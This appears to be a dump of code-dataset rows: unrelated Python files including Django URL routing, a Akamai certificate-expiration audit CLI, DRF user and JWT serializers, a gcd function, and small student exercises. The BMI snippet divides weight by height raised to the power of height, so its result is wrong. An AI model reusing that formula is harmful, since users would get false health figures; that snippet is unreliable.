path("reservation/rules/<int:pk>/", RedirectView.as_view(pattern_name='reservation_rule_list', permanent=True)),
path("reservation/machinetypes/<int:pk>/rules/", RedirectView.as_view(pattern_name='reservation_rule_list', permanent=True)),
path("reservation/rules/usage/<int:pk>/", RedirectView.as_view(pattern_name='machine_usage_rule_detail', permanent=True)),
path("reservation/machinetypes/<int:pk>/rules/usage/", RedirectView.as_view(pattern_name='machine_usage_rule_detail', permanent=True)),
path("news/article/<int:pk>/", RedirectView.as_view(pattern_name='article_detail', permanent=True)),
path("news/event/<int:pk>/", RedirectView.as_view(pattern_name='event_detail', permanent=True)),
path("news/ticket/<uuid:pk>/", RedirectView.as_view(pattern_name='event_ticket_detail', permanent=True)),
path("news/ticket/me/", RedirectView.as_view(pattern_name='event_ticket_my_list', permanent=True)),
prefix_default_language=False,
)
# These handlers are automatically registered by Django
# (see https://docs.djangoproject.com/en/stable/topics/http/views/#customizing-error-views)
def handler404(request, exception):
    """Render the site's custom 404 page instead of Django's default."""
    return defaults.page_not_found(request, exception=exception, template_name='web/404.html')
def handler500(request):
    """Render the site's custom 500 page instead of Django's default."""
    return defaults.server_error(request, template_name='web/500.html')
|
11,090 | 86b4616bd8ba70f65b542cf7c7101188a189c78f | class Solution:
def concatenatedBinary(self, n: int) -> int:
binString = ""
for i in range(n + 1):
binString = binString + "{0:b}".format(i)
return int(binString, 2) % 1000000007
|
11,091 | 323360bc3cce94146c0cb84be0a1b8c8205a308a | from django.conf.urls import url
from django.urls import path
from Blogs import views
urlpatterns = [
path('blog_posts.html', views.blog_posts, name='blog_posts'),
path('blog_form.html', views.blog_post_form, name='blog_post_form'),
] |
11,092 | fd9f1180c8f16f9b280f7a539a6d734926645ab2 | ########################
# Author: ~wy
# Date: 25/12/2017
# Description: Represents one of the 6 Guesses in the game
########################
class Guess:
    """One of the 6 guesses in the game: a thin wrapper around the chosen
    values that renders as '[<choices>]'."""

    def __init__(self, choices):
        # Store the caller's choice collection verbatim (no copy).
        self.choices = choices

    def get_choices(self):
        """Return the stored choices."""
        return self.choices

    def __str__(self):
        return f"[{self.choices}]"
|
11,093 | 0b97bad2fc0adf54957ed3cbb269590a3e8dde04 | height=input("Please enter your height in meter")
weight=input("please enter your weight in kg")
f_height=float(height)
f_weight=float(weight)
print(f_weight/(f_height**f_height)) |
11,094 | 28923379dc03a7742df5c0604c23abbd9c3b025f | import OpenSSL , ssl, argparse ,json, os.path, validators, requests, logging
from datetime import datetime
from dateutil.parser import parse
from urllib.parse import urljoin
from akamai.edgegrid import EdgeGridAuth, EdgeRc
from pathlib import Path
#TODO: FIX logger format
#turn off logger
#send ouput to tmp file
#improve help documentation
parser = argparse.ArgumentParser(description='Certificate Expiration Audit\nLatest version and documentation can be found here:\nhttps://github.com/roymartinezblanco/Akamai-SSL-Expiration-Audit',formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', help='Show script version information',
required=False, action='store_true')
parser.add_argument('--audit', type=str, choices=['account','config','file','list'], help='*required* Type of Audit to be done: [account,config,file,list]',
required=False)
parser.add_argument('--domains', nargs='+', type=str, help='List of domains to query.',
required=False)
parser.add_argument('--file-type', type=str, choices=['list','akamai'], help='File Type (list, akamai)',
required=False, default='akamai')
parser.add_argument('--file', type=str, help='File with list of domains (one per line)',
required=False)
parser.add_argument('--config-name',nargs='+', type=str, help='Name or List of Names to be audited.)',
required=False)
parser.add_argument('--verbose', help='Show debug information',
required=False, action='store_true')
parser.add_argument('--section', type=str, help='Select a Edgerc section other than the Default',
required=False)
parser.add_argument('--account-key', type=str, help='Account ID to Query for multi account management (switch key)',
required=False)
args = vars(parser.parse_args())
### Global Variables
version= "1.0.30"
errors = []
items = {}
item_list= []
logger = logging.getLogger("SSL-AUDIT")
def configure_logging():
    """Attach a DEBUG-level console handler to the module's logger.

    File logging is stubbed out below; enable it by defining LOG_FILENAME
    and uncommenting the handler setup.
    """
    logger.setLevel(logging.DEBUG)
    # Format for our loglines
    formatter = logging.Formatter("[%(asctime)s] - %(name)s - %(levelname)s - %(message)s")
    # Setup console logging
    ch = logging.StreamHandler()
    ch.setLevel(logging.DEBUG)
    ch.setFormatter(formatter)
    logger.addHandler(ch)
    # Setup file logging as well
    # fh = logging.FileHandler(LOG_FILENAME)
    # fh.setLevel(logging.INFO)
    # fh.setFormatter(formatter)
    # logger.addHandler(fh)
def readObject(File,Ftype:str,configName:str=None):
    """Load audit input and kick off certificate collection.

    File: path to a file ("list"/"akamai" types) or an already-parsed rules
        object when Ftype is "API".
    Ftype: "list" = one domain per line; anything else but "API" = Akamai
        property JSON; "API" = rules object fetched from PAPI.
    configName: property name, used for logging/attribution.
    """
    origins=[]
    if Ftype != "API":
        if os.path.exists(File):
            if Ftype == "list":
                # Plain text: one hostname per line.
                if args['verbose']:
                    #print("...... Reading file '{}'.".format(File))
                    logger.debug("Reading file '{}'.".format(File))
                lines = [line.rstrip('\n') for line in open(File)]
                getCertificates(lines)
            else:
                # Akamai property JSON: walk the rule tree for origins.
                try:
                    with open(File) as handle:
                        dictdump = json.loads(handle.read())
                except:
                    parser.error("Unable to Parse JSON File, please validate format.")
                else:
                    findOrigins(dictdump,origins,configName)
                    getCertificates(origins,configName)
        else:
            parser.error("The File {} does not exist!".format(File))
    else:
        # Rules object supplied directly from the PAPI response.
        if args['verbose']:
            logger.debug("Reading rules for the property '{}' .".format(configName))
        findOrigins(File,origins,configName)
        getCertificates(origins,configName)
def findOrigins(obj,origins:list,configName:str=None):
    """Recursively walk an Akamai rule-tree dict and collect the hostnames
    of every CUSTOMER-type 'origin' behavior into ``origins`` (mutated in
    place).

    Keys containing "values" are skipped to avoid descending into behavior
    option values.
    """
    # Record a hostname when this node is an origin behavior.
    for ok, ov in obj.items():
        if ok == "name" and ov == "origin":
            options = dict(obj["options"])
            if options["originType"] == "CUSTOMER":
                if args['verbose']:
                    logger.debug("Origin behavior found with the value '{}' on the configuration '{}'.".format(dict(obj["options"])["hostname"],configName))
                origins.append (dict(obj["options"])["hostname"])
    # Recurse into nested dicts and lists of dicts (children, behaviors...).
    for k, v in obj.items():
        if isinstance(v,dict) or isinstance(v,list):
            if "values" not in k.lower():
                if isinstance(v,list):
                    if len(v) > 0:
                        for i in v:
                            if isinstance(i, dict):
                                findOrigins(dict(i),origins,configName)
                else:
                    findOrigins(v,origins,configName)
def printJson():
    """Print the accumulated audit results (module-level ``item_list`` /
    ``errors``) as pretty-printed JSON to stdout."""
    if args['verbose']:
        logger.debug("Printing JSON.")
        logger.debug("[end]")
    if len(item_list) == 0:
        logger.error("No output generated to print!")
        return None
    if item_list[0] != {}:
        items['items'] = item_list
    # For 'list' audits, errors are collected globally rather than per item.
    if args['audit'] == "list":
        if len(errors) != 0:
            items['errors'] = errors
    formatted_json = json.dumps(items, sort_keys=False, indent=4)
    print(formatted_json)
def getCertificates(domains: list,configName:str=None):
    """Fetch each domain's TLS certificate over port 443 and append the
    results (serial, expiry date, days left) to the module-level
    ``item_list``; per-domain failures are recorded, not raised.
    """
    currentConfig={}
    if args['audit'] != "list" and args['audit'] != "file":
        currentConfig['propertyName'] = configName
    certs=[]
    er=[]
    for host in domains:
        if args['verbose']:
            logger.debug("Looking up the certificate for '{}' ".format(host))
        if "{{" in host:
            # Akamai variable placeholder (e.g. {{user.PMUSER_X}}) — skip.
            if args['verbose']:
                logger.warning("'{}' is a variable and will not be looked up!".format(host))
            er.append("'{}' is a variable and will not be looked up!".format(host))
        else:
            if validators.domain(host) != True:
                if args['verbose']:
                    if configName is not None:
                        logger.warning("'{}' is not a valid domain, on the configuration'{}'!".format(host,configName))
                    else:
                        logger.warning("'{}' is not a valid domain!".format(host))
                er.append("'{}' is not a valid domain!".format(host))
                continue
            # TLS handshake (SNI set to the host) to retrieve the leaf cert.
            try:
                hostname = host
                port = 443
                conn = ssl.create_connection((hostname,port), timeout=10)
                context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                sock = context.wrap_socket(conn, server_hostname=hostname)
                certificate = ssl.DER_cert_to_PEM_cert(sock.getpeercert(True))
                x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM,certificate)
            except BaseException as e:
                if args['verbose']:
                    logger.error("Can't connect to '{}' error: {}".format(host,str(e)))
                er.append("Can't connect to '{}' error: {}".format(host,str(e)))
            else:
                serial= '{0:x}'.format(x509.get_serial_number())
                exp_date = str(x509.get_notAfter().decode('utf-8'))
                dt = parse(exp_date)
                # Days until expiry, compared against (naive) UTC now.
                daystoexp=dt.replace(tzinfo=None)-datetime.utcnow()
                item = {}
                item['Domain'] = str(host)
                item['Serial'] = str(serial)
                item['ExpDate'] = str(dt.date())
                item['DaysLeft'] = daystoexp.days
                certs.append(item)
    if domains == []:
        if configName is not None:
            er.append("No customer origins found on the configuration '{}'.".format(configName))
            if args['verbose']:
                logger.warning("No customer origins found on the configuration '{}.".format(configName))
        else:
            er.append("No customer origins found.")
            if args['verbose']:
                logger.warning("No customer origins found.")
    if certs != []:
        currentConfig['certificates'] = certs
    if er != []:
        if args['audit'] != "list":
            currentConfig['errors'] = er
        else:
            errors.append(er)
    item_list.append(currentConfig)
    return
def propertyManagerAPI(action:str,config:str=None,p:list=None):
    """Call Akamai's Property Manager API (PAPI) for one of several actions.

    action -- one of ListGroups / ListContracts / ListProperties /
              GetRuleTree / SearchProperty.
              NOTE(review): there is no branch for ListContracts, so that
              action falls through and returns None — confirm whether it
              is still needed.
    config -- configuration (property) name, used by SearchProperty.
    p      -- a property record dict (propertyId, propertyVersion,
              contractId, groupId, propertyName), used by GetRuleTree.

    Results are accumulated in the module-level ``item_list`` via
    ``readObject``; ListGroups returns the parsed JSON response.
    """
    # Build EdgeGrid credentials from ~/.edgerc.
    try:
        home = str(Path.home())
        edgerc = EdgeRc(home+"/.edgerc")
        if args['section']:
            section = args['section']
        else:
            section = 'papi'
        host = edgerc.get(section,'host')
    except Exception as e:
        # Bug fix: the original logged "...".format(home+edgerc), which
        # concatenated a str with an EdgeRc object (TypeError) — or hit a
        # NameError when EdgeRc() itself failed — masking the real error.
        # Log only the caught exception, which is always bound here.
        logger.debug("Error authenticating EdgeRc: {}".format(e))
    http = requests.Session()
    http.auth= EdgeGridAuth.from_edgerc(edgerc,section)
    validActions = ["ListGroups","ListContracts","ListProperties","GetRuleTree","SearchProperty"]
    if action not in validActions:
        parser.error("Error: PAPI Unknown Action")
    #ListGroups
    elif action == validActions[0]:
        if args['verbose']:
            logger.debug("Listing account groups with PAPI.")
        if args['account_key']:
            endpoint='/papi/v1/groups?accountSwitchKey={}'.format(args['account_key'])
        else:
            endpoint= '/papi/v1/groups'
        result = http.get(urljoin("https://" + host + "/", endpoint))
        response = json.loads(json.dumps(result.json()))
        http.close()
        return response
    #ListProperties
    elif action == validActions[2]:
        # Enumerate every group/contract pair, then recurse into GetRuleTree
        # for each property that has a production-active version.
        gps = propertyManagerAPI("ListGroups")
        if gps is None:
            logger.warning("No Groups were found in account!")
            return None
        # elif gps['incidentId']:
        #     logger.error('{}'.format(gps['title']))
        #     return None
        for gp in gps['groups']['items']:
            for contract in gp['contractIds']:
                if args['verbose']:
                    logger.debug("Listing properties in '{}'/'{}' with PAPI.".format(gp['groupId'],contract))
                if args['account_key']:
                    endpoint= '/papi/v1/properties?contractId={}&groupId={}&accountSwitchKey={}'.format(contract,gp['groupId'],args['account_key'])
                else:
                    endpoint= '/papi/v1/properties?contractId={}&groupId={}'.format(contract,gp['groupId'])
                result = http.get(urljoin("https://" + host + "/", endpoint))
                http.close()
                response = json.loads(json.dumps(result.json()))
                for p in response['properties']['items']:
                    # Robustness fix: test `p is None` first and use .get()
                    # so a missing 'productionVersion' key cannot raise.
                    if p is None or p.get('productionVersion') is None:
                        item={}
                        er=[]
                        er.append("The configuration has no active version in production.")
                        if args['verbose']:
                            logger.warning("The configuration '{}' has no active version in production.".format(p['propertyName']))
                        item['propertyName']=p['propertyName']
                        item['errors']=er
                        item_list.append(item)
                    else:
                        # GetRuleTree expects 'propertyVersion'; rename the key.
                        p['propertyVersion']=p['productionVersion']
                        del p['productionVersion']
                        propertyManagerAPI("GetRuleTree","",p)
    #GetRuleTree
    elif action == validActions[3]:
        if args['verbose']:
            logger.debug("Getting rule tree for the '{}' property with PAPI.".format(p['propertyName']))
        if args['account_key']:
            endpoint= "/papi/v1/properties/{}/versions/{}/rules?contractId={}&groupId={}&validateRules=true&validateMode=fast&accountSwitchKey={}".format(
                p['propertyId'],
                p['propertyVersion'],
                p['contractId'],
                p['groupId'],
                args['account_key']
            )
        else:
            endpoint= "/papi/v1/properties/{}/versions/{}/rules?contractId={}&groupId={}&validateRules=true&validateMode=fast".format(
                p['propertyId'],
                p['propertyVersion'],
                p['contractId'],
                p['groupId']
            )
        result = http.get(urljoin("https://" + host + "/", endpoint))
        http.close()
        readObject(json.loads(json.dumps(result.json())) ,"API",p['propertyName'])
    #SearchProperty
    elif action == validActions[4]:
        if args['verbose']:
            logger.debug("Looking for the configuration '{}'.".format(config))
        if args['account_key']:
            endpoint='/papi/v1/search/find-by-value?accountSwitchKey={}'.format(args['account_key'])
        else:
            endpoint='/papi/v1/search/find-by-value'
        postbody = {}
        postbody['propertyName'] = config
        result = http.post(urljoin("https://" + host + "/", endpoint),json.dumps(postbody), headers={"Content-Type": "application/json"})
        http.close()
        if result.json()['versions']['items'] == []:
            # Property not found: record the error and bail out.
            item={}
            er=[]
            item['propertyName']=config
            if args['verbose']:
                logger.warning("The configuration '{}' was not found.".format(config))
            er.append("The configuration was not found.")
            item['errors']=er
            item_list.append(item)
            return
        else:
            if args['verbose']:
                logger.debug("The configuration '{}' was found.".format(config))
            prodversion = None
            for i in result.json()['versions']['items']:
                if i['productionStatus'] == "ACTIVE":
                    prodversion = True
                    propertyManagerAPI("GetRuleTree","",i)
            if prodversion is None:
                item={}
                er=[]
                if args['verbose']:
                    logger.warning("The configuration '{}' has no active version in production.".format(config))
                er.append("The configuration has no active version in production.")
                item['propertyName']=config
                item['errors']=er
                item_list.append(item)
        return json.loads(json.dumps(result.json()))
    return None
def main():
    """CLI entry point: route the parsed command-line arguments to the
    requested audit mode."""
    # --version short-circuits everything else.
    if args['version']:
        print(version)
        return
    if not args['audit']:
        parser.print_help()
    if args['verbose']:
        configure_logging()
        logger.info("[start]")
    mode = args['audit']
    if mode == "list":
        # Audit an explicit list of domains.
        if args['domains'] is None:
            parser.error("--domains is required to provide list of domains.")
        else:
            getCertificates(args['domains'])
            printJson()
    elif mode == "file":
        # Audit a configuration exported to a local file.
        if args['file'] is None:
            parser.error("--file is required to provide the file to audited.")
        else:
            readObject(args['file'], args['file_type'])
            printJson()
    elif mode == "config":
        # Audit one or more named configurations through PAPI.
        if args['config_name'] is None:
            parser.error("--config-name is required to provide configuration to be audited.")
        else:
            for name in args['config_name']:
                propertyManagerAPI("SearchProperty", name)
            printJson()
    elif mode == "account":
        # Audit every property in the account.
        #a = readEdgeRC()
        propertyManagerAPI("ListProperties")
        printJson()
# Standard script guard: run the CLI entry point only when executed directly.
if __name__ == '__main__':
    main()
|
11,095 | fbffe98481625d15b92767f836673c19e2b1e9a6 | import re
from rest_framework import serializers
from django.contrib.auth import get_user_model, authenticate
from django.contrib.auth.models import update_last_login
from django.utils.translation import gettext as _
from rest_framework_jwt.settings import api_settings
from wallet.serializers import WalletSerializer
JWT_PAYLOAD_HANDLER = api_settings.JWT_PAYLOAD_HANDLER
JWT_ENCODE_HANDLER = api_settings.JWT_ENCODE_HANDLER
class UserSerializer(serializers.ModelSerializer):
    """Serializer for creating users; the password is write-only and is
    hashed by the user manager in ``create``."""

    class Meta:
        model = get_user_model()
        fields = ('id', 'email', 'first_name', 'last_name', 'nick_name', 'profile_image', 'phone_number', 'password')
        extra_kwargs = {
            'id': {
                'read_only': True
            },
            'password': {
                'min_length': 5,
                'write_only': True,
                'style': {
                    'input_type': 'password'
                }
            },
            'email': {
                'error_messages': {
                    'blank': 'ایمیل را وارد کنید.',
                    'unique': 'کاربری با این ایمیل موجود می باشد.'
                }
            },
            'first_name': {
                'error_messages': {
                    'max_length': 'نام نهایتا می تواند 30 کاراکتر باشد.',
                    'blank': 'نام را وارد کنید.'
                }
            },
            'last_name': {
                'error_messages': {
                    'max_length': 'نام خانوادگی نهایتا می تواند 50 کاراکتر باشد.',
                    'blank': 'نام خانوادگی را وارد کنید.'
                }
            },
            'phone_number': {
                'error_messages': {
                    'max_length': 'ماره تلفن نهایتا می تواند 13 کاراکتر باشد.'
                }
            },
            'profile_image': {
                'error_messages': {
                    'invalid_extension': 'فقط فایل های با پسوند jpg و png و jpeg قابل قبول می باشند'
                }
            }
        }

    def create(self, validated_data):
        """Create a user via the manager so the password is properly hashed."""
        user = get_user_model().objects.create_user(**validated_data)
        return user

    def validate_phone_number(self, value):
        """Validate an optional Iranian mobile number; empty values pass."""
        if not value:
            return value
        # Bug fix: the original character class [1|2|3|4] also matched a
        # literal '|'; [1-4] is the intended set.  Raw string avoids any
        # ambiguity around the backslash escapes.
        # NOTE(review): the pattern is unanchored at the end, so trailing
        # characters after a valid prefix still pass — confirm intent.
        if not re.match(
            pattern=r"(0|\+98)?([ ]|-|[()]){0,2}9[1-4]([ ]|-|[()]){0,2}(?:[0-9]([ ]|-|[()]){0,2}){8}",
            string=value
        ):
            raise serializers.ValidationError(
                _('شماره تلفن وارد شده معتبر نمی باشد.'),
                code='invalid'
            )
        return value
class EditUserSerializer(serializers.ModelSerializer):
    """Serializer for editing a user's own profile; exposes the wallet
    balance read-only via its 'amount' slug."""

    wallet = serializers.SlugRelatedField(slug_field='amount', read_only=True)

    class Meta:
        model = get_user_model()
        fields = ('email', 'first_name', 'last_name', 'nick_name', 'profile_image', 'phone_number', 'wallet')
        extra_kwargs = {
            'email': {
                'error_messages': {
                    'blank': 'ایمیل را وارد کنید.',
                    'unique': 'کاربری با این ایمیل موجود می باشد.'
                }
            },
            'first_name': {
                'error_messages': {
                    'max_length': 'نام نهایتا می تواند 30 کاراکتر باشد.',
                    'blank': 'نام را وارد کنید.'
                }
            },
            'last_name': {
                'error_messages': {
                    'max_length': 'نام خانوادگی نهایتا می تواند 50 کاراکتر باشد.',
                    'blank': 'نام خانوادگی را وارد کنید.'
                }
            },
            'phone_number': {
                'error_messages': {
                    'max_length': 'ماره تلفن نهایتا می تواند 13 کاراکتر باشد.'
                }
            },
            'profile_image': {
                'error_messages': {
                    'invalid_extension': 'فقط فایل های با پسوند jpg و png و jpeg قابل قبول می باشند'
                }
            },
            'wallet': {
                'read_only': True
            }
        }

    def validate_phone_number(self, value):
        """Validate an optional Iranian mobile number; empty values pass."""
        if not value:
            return value
        # Bug fix: [1|2|3|4] also matched a literal '|'; [1-4] is the
        # intended character class (same fix as UserSerializer).
        if not re.match(
            pattern=r"(0|\+98)?([ ]|-|[()]){0,2}9[1-4]([ ]|-|[()]){0,2}(?:[0-9]([ ]|-|[()]){0,2}){8}",
            string=value
        ):
            raise serializers.ValidationError(
                _('شماره تلفن وارد شده معتبر نمی باشد.'),
                code='invalid'
            )
        return value
class UserTokenSerializer(serializers.Serializer):
    """Exchange email/password credentials for a JWT token."""

    class Meta:
        fields = ('email', 'password', 'token')
        # NOTE(review): extra_kwargs (and the 'error_message' key spelling —
        # DRF uses 'error_messages') appears inert on a plain Serializer,
        # since the fields below are declared explicitly — confirm.
        extra_kwargs = {
            'password': {
                'style': {
                    'input_type': 'password'
                },
                'min_length': 5,
                'write_only': True,
                'error_message': {
                    'required': 'رمزعبور را وارد کنید'
                }
            },
            'email': {
                'error_message': {
                    'required': 'ایمیل را وارد کنید'
                }
            }
        }

    email = serializers.EmailField(max_length=255, required=True)
    password = serializers.CharField(max_length=255, write_only=True, required=True)
    token = serializers.CharField(max_length=255, read_only=True)

    def validate(self, attrs):
        """Authenticate the credentials, mint a JWT and stamp last_login.

        Returns a dict with the user's email and the encoded token.
        Raises ValidationError for bad credentials or inactive accounts.
        """
        email = attrs.get('email', None)
        password = attrs.get('password', None)
        user = authenticate(email=email, password=password)
        if not user:
            raise serializers.ValidationError(
                'کاربر با این اطلاعات پیدا نشد.',
                code='INVALID_CREDENTIAL'
            )
        if not user.is_active:
            raise serializers.ValidationError(
                'حساب کاربری شما فعال نمی باشد',
                code='USER_NOT_ACTIVE'
            )
        try:
            payload = JWT_PAYLOAD_HANDLER(user)
            token = JWT_ENCODE_HANDLER(payload)
            update_last_login(None, user)
        # Bug fix: Django's attribute is DoesNotExist (no trailing 's');
        # the original 'DoesNotExists' raised AttributeError instead of
        # catching the intended exception.
        except get_user_model().DoesNotExist:
            raise serializers.ValidationError(
                'کاربر با ایمیل داده شده پیدا نشد.',
                code='INVALID_CREDENTIAL'
            )
        return {
            'email': user.email,
            'token': token
        }
class ChangePasswordSerializer(serializers.Serializer):
    """Payload for changing the current user's password.

    NOTE(review): extra_kwargs is a ModelSerializer Meta option; on this
    plain Serializer the entries below appear inert because the fields are
    declared explicitly above — confirm before relying on them.
    """

    # Current password; min_length mirrors the account password rule.
    old_password = serializers.CharField(
        required=True,
        min_length=5,
        error_messages={
            'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
        }
    )
    # Replacement password, same length rule.
    new_password = serializers.CharField(
        required=True,
        min_length=5,
        error_messages={
            'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
        }
    )

    class Meta:
        fields = ('old_password', 'new_password')
        extra_kwargs = {
            'old_password': {
                'write_only': True,
                'style': {
                    'input_type': 'password'
                },
                'error_messages': {
                    'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
                }
            },
            'new_password': {
                'write_only': True,
                'style': {
                    'input_type': 'password'
                },
                'error_messages': {
                    'min_length': 'رمز باید از 5 کاراکتر بیشتر باشد'
                }
            }
        }
class ResetPasswordSerializer(serializers.Serializer):
    """Payload for resetting a forgotten password with a one-time code.

    NOTE(review): extra_kwargs appears inert on a plain Serializer (it is a
    ModelSerializer Meta option) — confirm before relying on these messages.
    """

    class Meta:
        fields = ('reset_code', 'new_password')
        extra_kwargs = {
            'new_password': {
                'min_length': 5,
                'style': {
                    'input_type': 'password'
                },
                'write_only': True,
                'error_messages': {
                    'required': 'رمز جدید را وارد کنید',
                    'min_length': 'رمز باید بیشتر از 5 کاراکتر باشد'
                }
            }
        }

    # One-time numeric code previously delivered to the user.
    reset_code = serializers.IntegerField(required=True)
new_password = serializers.CharField(min_length=5, required=True) |
11,096 | e38b7dc98a9ff5e334cdb7562987d61df60cf7c5 | '''
Created on Sep 5, 2019
@author: achaturvedi
'''
# Hard-coded quiz answer under test; anything other than 42 is wrong.
answer = 17
retry_message = "That is not the correct answer. Please try again"
if answer != 42:
    print(retry_message)
def gcdEuclidAdv(m, n):
    """Return the greatest common divisor of m and n (Euclid's algorithm).

    Bug fix: the original swapped the arguments so that m <= n before
    computing m % n; since m % n == m whenever 0 < m < n, the recursive
    call gcdEuclidAdv(n, m % n) then repeated the same pair forever
    (e.g. gcd(8, 12) -> gcd(12, 8) -> gcd(12, 8) ...).  Plain Euclid needs
    no swap: when m < n, the first recursion reorders the pair by itself.
    """
    if m % n == 0:
        return n
    return gcdEuclidAdv(n, m % n)
# Interactive driver: read two integers and print their greatest common divisor.
value_m = int(input("Enter m value : "))
value_n = int(input("Enter n value : "))
print(gcdEuclidAdv(value_m, value_n))
11,098 | 2d09b9d26c9f7ef5ff786061e6b3b6eb7e2d20fc | km_percorridos=float(input("Digite os kilometros percorridos: "))
# Car-rental bill: R$60.00 per rented day plus R$0.15 per kilometre driven
# (km_percorridos is read from the user just above this block).
dias_alugado=int(input("Quantidade de dias que o carro foi alugado: "))
# Flat daily charge.
aluguel=dias_alugado*60
# Distance charge.
valor_km=km_percorridos*0.15
total_aluguel=aluguel+valor_km
print("O valor a pagar por dias locado fica R$%5.2f e o valor pela quantidade de Km rodados fica R$%5.2f"%(aluguel,valor_km))
print("O total a pagar pelo aluguel do carro fica R$%5.2f" %total_aluguel)
print("Obrigada") |
11,099 | ffda8c77c2895d334472eb1cfb8f2cedc0e9d4ab | # Напишите программу, которая обрабатывает результаты IQ-теста из файла “2-in.txt".
# В файле лежат несколько строк со значениями(не менее 4-х).
# Программа должна вывести в консоль среднее арифметическое по лучшим трем в каждой строке результатам(одно число).
# Average the three best IQ results of every line in "2-in.txt" and print
# that single number.
#
# Fixes over the original:
#  * split(' ') left '\n' glued to the last token, so the final score of
#    every line failed isdigit() and was silently dropped; split() strips it.
#  * `b = []*3*len(a)` was a no-op (always []); replaced with a plain list.
#  * lines with fewer than three scores made range(len(n)-3, len(n)) start
#    at a negative index and re-count values; a [-3:] slice takes whatever
#    is available instead.
lines = []
with open('2-in.txt') as results_file:
    for line in results_file:
        lines.append(line)

best_scores = []
for line in lines:
    # Keep only whole-number tokens, sorted ascending.
    scores = sorted(int(tok) for tok in line.split() if tok.isdigit())
    # Top three results of this line (all of them if fewer than three).
    best_scores.extend(scores[-3:])

# NOTE(review): an empty/numberless file would raise ZeroDivisionError here,
# matching the original behaviour.
print(sum(best_scores) / len(best_scores))
input()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.